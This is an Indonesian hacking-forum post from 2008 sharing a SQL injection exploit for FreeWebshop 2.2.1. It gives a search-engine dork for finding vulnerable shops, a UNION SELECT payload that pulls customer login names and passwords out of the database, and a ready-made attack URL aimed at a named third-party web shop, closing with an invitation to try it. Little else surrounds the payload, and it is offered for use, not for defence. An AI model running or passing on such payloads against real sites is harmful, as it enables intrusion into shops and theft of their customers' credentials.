FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Topik sebelumnya Topik selanjutnya Go down

FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Post by juniorsev3n on Thu Feb 21, 2008 4:17 pm

google dork: "Powered by FreeWebshop.org 2.2.1"
contohwebsite: http://www.atelierinderoos.nl/
bug: index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

====
jadi
http://www.atelierinderoos.nl/index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

===
keterangan lengkap di
http://milw0rm.com/exploits/4740

maap bug lama tapi enak ni blind sql injection
===
selamat mencoba
avatar
juniorsev3n
Archxecutor

Jumlah posting : 145
Age : 23
Location : Bandung Underground
Registration date : 23.01.08

Lihat profil user http://juniorsev3n.co.cc

Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik